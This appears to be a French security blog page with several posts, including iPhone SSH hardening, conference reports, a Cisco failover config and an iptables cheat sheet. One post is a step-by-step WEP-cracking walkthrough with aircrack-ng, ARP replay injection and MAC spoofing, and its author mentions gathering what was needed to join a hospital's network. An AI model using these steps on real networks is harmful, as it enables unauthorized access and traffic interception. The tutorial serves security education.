Skip to main content
KAIZER ONION

Un ver dans la pomme

Pour les personnes qui auraient jailbreakés leur iPhone et installés OpenSSH, je vous invite fortement à  suivre ce petit tuto.
Actuellement sur la toile tourne un ver qui impacte tous les iPhones jailbreakés qui ont installé openSSH. En effet, il utilise le mot de passe par défaut (alpine) du compte root pour se connecter à  votre iPhone via SSH et changer votre fond d’écran. A l’origine le ver a été conçu par un australien de 21 ans pour sensibiliser les utilisateurs à  la gravité de la faille de sécurité, mais depuis le ver a été repris et ne se contente plus de changer votre fond d’écran, il vous vole la liste de vos contacts, vos mails, vos SMS et tout autre donnée disponible. Pour éviter d’avoir sa liste de contacts sur le web, je vous recommande de changer le mot de passe du compte root et de bloquer l’accès à  SSH pour l’utilisateur mobile. D’un point de vue sécurité, l’idéal serait de bloquer l’accès direct au compte root et de créer un compte utilisateur autorisé à  se connecter au serveur SSH.

Dans un premier temps, changez le mot de passe du compte root en utilisant le terminal ou par SSH:

# passwd
New password:
Retype new password:

Ensuite, éditez le fichier de configuration de votre serveur SSH afin de bloquer l’accès au serveur pour le compte mobile :

# vi /etc/ssh/sshd_config

Allez à  la fin du document avec la commande “: $”, passez en mode édition avec “: i” puis insérez la ligne suivante :

DenyUsers mobile

Sauvegardez avec la commande “: wq”.

Et voilà  le tour est joué, votre iPhone est maintenant sécurisé.

DeepSec Day #1

Je suis actuellement à  la conférence Autrichienne DeepSec à  Vienne. Elle se déroule sur quatre jours dont les deux premiers jours sont dédiés aux Workshops. C’est ma première édition et je dois dire que je ne suis pas déçu. D’une part le cadre est fort agréable (la conférence s’est établie dans l’hôtel The Imperial Riding School Vienna), et d’autre part notre première journée c’est agréablement bien passée.

Concernant les Workshops, ce n’est pas moins de huit training qui sont proposés. Pour ma part j’ai suivi le workshop Web 2.0 Security – Advanced Attacks and Defense présenté par Vimal Patel & Prashant Thakar (Blueinfy Solutions Pvt. Ltd.). Les deux indiens connaissent bien le sujet et leur présentation est rodée. Les travaux pratiques sur le protocole AMF pour les applications Flex sont prometteurs, nous verront ça demain. Pour le reste, la plus part du temps, le contenu a pris des airs de refrain, mais la soirée fut très original.

shnitzel

Après une petit heure de piscine, nous avons été manger la célèbre Wiener Shnitzel dans un petit restaurant du centre. Accompagné d’un des organisateurs de la conférence, nous avons eu droit a une visite guidé quelque peu spéciale. En effet, nous nous sommes rendu dans le quartier 21 ou se loge une organisation connu sous le nom de quintessenz qui lutte pour la restauration des droits civils en termes d’informatique.

quartier21

Ils décernent chaque 25 Octobre des Big Brother Awards à  chaque organisation, société qui ne respectent pas les droits civils et la vie privée des gens. Autant vous le dire tout de suite ce sont des passionnés qui ne comptent pas leurs heures.

metalab

Autre endroit, autre style, nous nous sommes rendu dans un Hackerspaces. Nous avons eu le droit à  un petit tour du propriétaire et surtout à  une démonstration de la découpeuse au Laser. Ce lieu appelé le club-metalab, regorge d’appareil fait maison. Que ce soit un mur de verre illuminé programmable via une interface web, ou encore une mallette contenant trois hot spot wifi disséqués et inter connectés, ce ne sont pas les idées qui manquent. Les installations ont un style un peu underground assumé. Chaque personne que nous avons croisé avait une bouteille de Club-Mate à  la main, un breuvage qui apparemment les maintiens en éveille. Notre petit groupe de visiteur nocturne était bien content de rentrer après cette escapade.

deepsec

Cisco multiple ISP avec IP SLA

Récemment j’ai été confronté à  un problème de configuration sur un routeur Cisco 3845. L’objectif était simple, il fallait configurer du failover sur le routeur entre deux provider. D’un côté une ligne louée et de l’autre une connexion ADSL négociée à  partir du routeur. Si l’énoncé semble simple, le résultat n’est pas pour autant évident (surtout pour un expert Cisco comme moi).

Le premier requis est d’avoir la bonne version d’IOS installé, en l’occurrence la fonctionnalité ip sla est disponible à  partir de l’IOS 12.4 avec le feature set advanced IP services ou advanced security. Pour rappel, vous trouverez la procédure pour mettre à  jour un IOS Cisco ici. Voici un petit schéma qui reprends l’énoncé précédent.

Cisco IP SLA
Cisco IP SLA

Voici la configuration nécessaire au bon fonctionnement de votre loadbalancing :

hostname Router_Name
!
ip cef
!
!#### Définir les objets de tracking. Ces objets sont utilisés pour ####!
!#### vérifier la disponibilité d’un host sur chaque ISP ####!
!
ip sla 1
icmp-echo 1.1.1.2 source-ip 1.1.1.1
frequency 30
ip sla schedule 1 start-time now life forever
!
ip sla 2
icmp-echo 2.2.2.3 source-ip 2.2.2.2
frequency 30
ip sla schedule 2 start-time now life forever
!
!#### Configurer les objets de tracking (cf. IP SLA) ####!
!
track 101 rtr 1 reachability
track 102 rtr 2 reachability
!
!#### Configuration des différentes interfaces ####!
!
interface GigabitEthernet0/0
description Internal connection
ip address 192.168.1.1 255.255.255.0
no ip redirects
no ip unreachables
no ip proxy-arp
ip flow ingress
ip nat inside
ip virtual-reassembly
duplex auto
speed auto
media-type rj45
no mop enabled
!
interface GigabitEthernet0/1
description ADSL connection
no ip address
no ip redirects
no ip unreachables
no ip proxy-arp
ip flow ingress
duplex auto
speed auto
media-type rj45
pppoe enable
pppoe-client dial-pool-number 1
no mop enabled
!
interface FastEthernet0/1/0
switchport access vlan 3
!
interface FastEthernet0/1/1
!
interface FastEthernet0/1/2
!
interface FastEthernet0/1/3
!
interface Vlan3
description Lease Line
ip address 1.1.1.1 255.255.255.248
ip nat outside
ip virtual-reassembly
!
interface Dialer0
ip address negotiated
no ip redirects
no ip unreachables
no ip proxy-arp
ip mtu 1492
ip flow ingress
ip nat outside
ip virtual-reassembly
encapsulation ppp
ip tcp adjust-mss 1412
dialer pool 1
dialer-group 1
ppp authentication pap callin
ppp pap sent-username user password 5 5s454f654r64v4br5t4bvr4
!
!#### Définition des routes en fonction des objets de tracking ####!
!#### dans notre, nous avons une configuration de load balancing ####!
!#### mais on pourrait définir une priorité sur une route pour éviter le loadbalancing ####!
!
ip route 0.0.0.0 0.0.0.0 vlan3 track 101
ip route 0.0.0.0 0.0.0.0 dialer0 track 102
!
!#### Configurer le NAT pour le trafic entrant ####!
!
ip nat inside source route-map ISP1 interface vlan3 overload
ip nat inside source route-map ISP2 interface dialer0 overload
!
!#### Configuration du NAT pour du traffic VPN entrant ####!
!
ip nat inside source static udp 192.168.1.1 500 1.1.1.1 500 route-map ISP1 extendable
ip nat inside source static udp 192.168.1.1 500 2.2.2.2 500 route-map ISP2 extendable
ip nat inside source static 192.168.1.1 1.1.1.1 route-map ISP1 extendable
ip nat inside source static 192.168.1.1 2.2.2.2 route-map ISP2 extendable
!
!#### Configuration des route maps en référence à  la configuration du NAT ####!
!
route-map ISP1 permit 100
match interface vlan3
!
route-map ISP2 permit 100
match interface dialer0
!

Sources :
http://www.blindhog.net/cisco-dual-internet-connections-without-bgp
http://hypergressive.blogspot.com/2009/03/dual-isp-load-balancing-configuration.html

Hack.lu, la defcon Luxembourgeoise

Comme chaque année en octobre, c’est la grande messe de la sécurité informatique qui se déroule le 28-30 Octobre à  Luxembourg. Pour la deuxième année consécutive, dartalis (mon employeur) sponsorise l’événement.
Cette année s’annonce être un bon cru au vu des speakers retenus par les membres de l’association. Pour en citer quelques uns, il y aura Matt Suiche avec une présentation intéressante de son outil win32dd qui permet de faire un dump de la mémoire physique de votre windows vista. Il y aura aussi le duo Daniele Bianco et Andrea Barisani avec leur présentation sur l’émanation d’ondes des claviers. Notons également la présence de Saumil Shah qui l’année passée avait fait une superbe présentation sur la sécurité des navigateurs web. Le premier jour de la conférence sera dédié aux Workshops, avec deux sessions simultanées. La première, Bypassing the Perimeter: Client Side Exploitation sera présenté par Nitesh Dhanjani et Billy K Rios, et la seconde parlera de DAVIX Visualisation et sera présenté par Jan P. Monsch.
Maintenant le mieux pour se faire un avis c’est d’y participer, alors rdv là  bas !! En attendant vous pouvez suivre les news sur leur site web : hack.lu ou comme moi sur twitter

Wifi / Hara-kiri (Seppuku)

Cette semaine j’ai été surpris d’apercevoir, dans un centre hospitalier, un spot wifi (professionnel) avec du WEP. Même si il y avait du filtrage par adresse mac et le service DHCP était coupé, cela m’a pris quelques minutes supplémentaires pour obtenir toutes les informations nécessaires à  la connexion de ce réseau… Alors je me suis dit qu’un petit rappel sur la sécurité des réseaux wifi pourrait être utile afin d’éviter l’hara-kiri.

Actuellement nous avons les différents types d’authentification suivants :

  • WEP Open ou Shared Key
  • WPA PSK avec encryption TKIP ou AES
  • WPA Enterprise avec encryption TKIP ou AES
  • WPA2 PSK avec encryption TKIP ou AES
  • WPA2 Enterprise avec encryption TKIP ou AES
  • 802.1x

Sur ces différents modes d’authentification, il y a bien entendu le WEP qui est complètement obsolète, et le protocole d’encryption TKIP qui contient des faiblesses découvertes par deux chercheurs allemands en novembre 2008.
Je ne vais pas refaire une biographie complète du WEP car il en existe déjà  beaucoup sur internet. Mais je vais vous montrer (à  nouveau car pour certain ce n’est pas clair visiblement) comment il est facile de casser une clé WEP.

Personnellement j’utilise le live CD backtrack 4 qui contient tous les outils nécessaires pour notre démo.

Pour la suite de la démonstration, on prendra pour acquis les éléments suivants :

  • MAC adresse du point d’accès cible : 00:CA:FE:BA:BE:FF
  • MAC adresse du client connecté sur le point d’accès : 00:BA:BE:CA:FE:FF
  • BSSID du point d’accès cible : POVWEP
  • Dans un premier temps, je mets ma carte wifi en mode monitor :

    airmon-ng start wlan0

    Puis je lance airodump-ng, il permet de scanner les réseaux wifi. Airodump-ng est simple d’utilisation.

    Usage: airodump-ng

    Airodump-ng offre une multitude d’options et de filtres afin de cibler ce que l’on souhaite surveiller.

    Options airodump-ng:

    -w permet de créer un fichier de capture dans lequel seront enregistrés tous les paquets.
    Exemple: airodump-ng -w out wlan0

    –encrypt permet de filtrer les réseaux en fonction du type d’encryption utilisé.
    Exemple: airodump-ng –encrypt wep wlan0 (seuls les réseaux en WEP seront affichés)

    -c permet de cibler l’écoute sur un canal wifi particulier.
    Exemple: airodump-ng -c 10 wlan0 (airodump-ng n’écoutera que le canal 10)

    –bssid permet de ne cibler qu’un seul point d’accès en fonction de son adresse mac.
    Exemple: airodump-ng –bssid 00:CA:FE:BA:BE:FF wlan0 (airodump-ng ne surveillera que le point d’accès dont l’adresse mac est 00:CA:FE:BA:BE:3F)

    Donc si je veux faire un tour d’horizon ce que qui ce passe dans le coin, je lance :

    airodump-ng wlan0

    Je peux apercevoir que le point d’accès 00:CA:FE:BA:BE:FF a du WEP et un client connecté. Parfait, nous pouvons commencer. On lance un autre airodump qui va créer un fichier de capture. Ce fichier de capture sera utilisé par aireplay pour rejouer les ARP (injections de paquets).

    airodump-ng -w out -c 10 –bssid 00:CA:FE:BA:BE:FF wlan0

    Maintenant que nous sommes focalisé sur notre point d’accès et que nous avons un client connecté, nous pouvons tenter de nous associer au point d’accès avec aireplay :

    aireplay-ng

    Voici les différentes options de aireplay :

    –deauth count : deauthenticate 1 or all stations (-0)
    –fakeauth delay : fake authentication with AP (-1)
    –interactive : interactive frame selection (-2)
    –arpreplay : standard ARP-request replay (-3)
    –chopchop : decrypt/chopchop WEP packet (-4)
    –fragment : generates valid keystream (-5)
    –caffe-latte : query a client for new IVs (-6)
    –cfrag : fragments against a client (-7)
    –test : tests injection and quality (-9)

    On utilise l’option -1 fakeauth (association & authentification) pour notre test :

    aireplay-ng -1 0 -e POVWEP -a 00:CA:FE:BA:BE:FF -b 00:CA:FE:BA:BE:FF -h 00:BA:BE:CA:FE:FF wlan0

    POVWEP: essid (nom du réseau wifi)

    00:CA:FE:BA:BE:FF: adresse mac du point d’accès

    00:BA:BE:CA:FE:FF: adresse mac du client (“station” sous airodump-ng)

    wlan0: notre interface wifi

    Maintenant nous pouvons lancer notre attaque par rejeux d’ARP (injection de paquets). On utilise l’option -3 standard ARP-request replay (rejeu d’arp) :

    aireplay-ng -3 -e Livebox-a1b2 -a 00:CA:FE:BA:BE:FF -b 00:CA:FE:BA:BE:FF -h 00:BA:BE:CA:FE:FF -x 600 -r out-01.cap wlan0

    POVWEP: essid (nom du réseau wifi)

    00:CA:FE:BA:BE:FF: adresse mac du point d’accès

    00:BA:BE:CA:FE:FF: adresse mac du client (“station” sous airodump-ng)

    600: nombre de paquets par secondes qui seront injectés (à  régler en fonction de la qualité du signal wifi)

    out-01.cap: notre fichier de capture airodump-ng

    wlan0: notre interface wifi

    Il ne reste plus qu’attendre afin d’obtenir 40000 ARP pour décrypter la clé WEP. Une fois vos 40000 ARP dans votre fichier de capture, il ne reste plus qu’à  décrypter la clé à  l’aide de aircrack.

    Aircrack-ng est très simple d’utilisation.

    usage: aircrack-ng [options] <.cap / .ivs file(s)>

    Dans notre cas, nous allons utiliser la commande suivante :

    aircrack-ng out-01.cap

    Quelques minutes après vous pourrez voir :

    KEY FOUND! [ FA:E6:18:26:27:56:B5:4D:C5:31:40:71:56 ]

    Maintenant si le réseau fait du filtrage par MAC adresse vous avez déjà  un mac adresse de disponible, utilisez là  :

    ifconfig wlan0 hw ether 00:BA:BE:CA:FE:FF

    Et si le service DHCP n’est pas activé, vous pouvez utiliser wireshark afin de définir l’adressage du réseau. Commencez par lancer wireshark.
    Puis configurer wireshark pour qu’il décrypte les paquets avec la clé WEP que vous venez juste de décrypter.

    Allez dans Edit\preferences\protocols\IEEE 802.11
    puis entrer la clé WEP
    Cochez Assume packets have FCS et enable decryption

    Screenshot-Wireshark: Preferences

    Vous pouvez commencer à  sniffer en allant dans capture\options

    Screenshot-Wireshark: Capture Options

    Si vous voulez être plus granulaire dans votre recherche vous pouvez faire un filtre sur votre point d’accès :

    (wlan.bssid==00:CA:FE:BA:BE:FF) && (tcp)

    Screenshot-The Wireshark Network Analyzer

    Vous allez découvrir des choses intéressantes.

    Deux formules à  retenir (dont une que j’empreinte à  sid) :

    WPA != PSK + TKIP
    WIFI != WEP

Fire at the QA department

La semaine dernière a été riche en événements. Alors que Microsoft sortait sa nouvelle version d’Internet Explorer (version 8), à  Vancouver la CanSecWest fêtait sa dixième édition.

Le fil conducteur entre ces deux événements s’appelle Nils, un jeune étudiant Allemand. Il a réussi à  mettre à  mal la sécurité des trois navigateurs web les plus utilisés (dont Internet Explorer 8), et ceci sur une machine à  jour.

Continue reading

Session lockpicking

Lock picking (crochetage en Français) est l’art d’ouvrir une serrure en l’analysant et la manipulant avec des outils de crochetage, et ceci sans la clef d’origine. Bien que le crochetage peut être associé à  des intentions criminelles, c’est une compétence essentielle pour un serrurier.

La plupart des serrures peuvent être rapidement et facilement ouverte en utilisant des outils commun tel un trombone, un morceau de scie, etc …

Certaines personnes ont comme hobby le lockpicking, car ils trouvent qu’il apporte une satisfaction et est une façon agréable de passer le temps, il a aussi une valeur de hack.

Personnellement, j’ai découvert le lockpicking en tant que sport lors de la DefCon 16 et depuis je le pratique de temps à  autre les weekends. Plus petit, je m’amusais déjà  à  ouvrir la serrure de ma tirelire, je me suis attaqué aussi à  la porte d’entrée de mes parents après avoir regardé MacGyver ouvrir une porte avec un couteau suisse … Maintenant je sais que ce n’est pas possible … 🙂

Cependant j’ai réussi à  ouvrir une serrure de porte d’entrée traditionnelle en utilisant la méthode du racking. Le racking est une méthode qui demande moins de dextérité mais qui fonctionne bien sur les serrures bas de gamme. Le principe est simple, l’outil en dent de scie doit faire un glissement rapide sur tous les pins, à  maintes reprises, afin de faire rebondir les pins jusqu’à  ce qu’elles atteignent la ligne de cisaillement.

Voici une petite démonstration sur un cadenas standard.

Sources:

http://en.wikipedia.org/wiki/Lockpicking

http://www.lysator.liu.se/mit-guide/MITLockGuide.pdf

http://www.lockpickshop.com/MPXS-14.html

Iptables reminder

Je suis toujours à  la recherche des bonnes commandes iptables, alors j’en profite pour me faire un petit pense bête :

Lister les règles :

# iptables -nvL –line-numbers

Sauvegarder votre config :

# service iptables save

Sortir votre conf en fichier texte :

# iptables save

Insérer une règle à  la position 12 par exemple:

# iptables -I RH-Firewall-l-INPUT 12 -p tcp -m state –state NEW -m tcp –dport 7804 -j ACCEPT

Restaurer une conf :

# iptables-restore your_config_file

Limiter le temps entre deux connections de la même adresse IP :

# iptables -A INPUT -p tcp -i eth0 -m state –state NEW –dport 22 -m recent –update –seconds 15 -j DROP
# iptables -A INPUT -p tcp -i eth0 -m state –state NEW –dport 22 -m recent –set -j ACCEPT

Satellite Hacking for Fun and Profit by Adam Laurie

Adam Laurie fait à  nouveau le buzz avec sa présentation “Satellite Hacking for Fun and Profit” à  la BlackHat Briefing à  Washington. On se souvient  de sa brillante intervention sur les puces RFID au hack.lu où il nous avait montré avec quelle facilité on pouvait lire, clôner et éditer les données de son passeport biométrique. Cette fois, c’est aux satellites qu’il s’attaque. Vous me direz “on a pas attendu sur lui pour avoir Canal SAT ou TPS gratuit”. De plus, avec les réseaux de key sharing qui prolifèrent sur la toile et leurs abonnements parfois plus chers que l’officiel. Passons …
Adam a démontré lors de la conférence, qu’il est possible d’écouter les communications de satellites grâce à  l’interface réseau de votre Dreambox. Pour les néophytes, la Dreambox est ni plus ni moins qu’un démodulateur tournant sous linux. Il vous suffit de lancer un sniffer réseau comme WireShark sur votre pc portable, de le connecter à  votre dreambox et c’est parti ! Une parabole de 1 mètre motorisé suffit pour scanner les différentes fréquences.

blackhat-2008-04-22

Les chercheurs Jim Geovedi, Raditya Iryandi, et Anthony Zboralski avaient déjà  exposé les mêmes failles ici (PDF), mais leur méthode nécessite une parabole de 2 à  4 mètres. Ce qui rend leur étude plus difficile à  vérifier contrairement à  celle d’Adam.

Adam a developpé un script qui permet de scanner différentes fréquences et d’identifier certains types de contenus, y compris le trafic basé sur TCP, UDP ou SMTP. Ce qui devient intéressant, c’est d’apprendre le type de données qui transite sur ces fréquences…

Back in the city (San Francisco)

Je suis actuellement à  San Francisco pour une formation Checkpoint.
La formation (de type bootcamp) est intense mais très utile. Les labs sont consistants et bien détaillés.

La formation est animé par Barry Stiefel. Il modère aussi le forum cpug qui comprends un peu près 17 000 utilisateurs et 36 000 posts sur checkpoint.

Je profite de l’occasion pour partager avec vous la vue de mon hotel.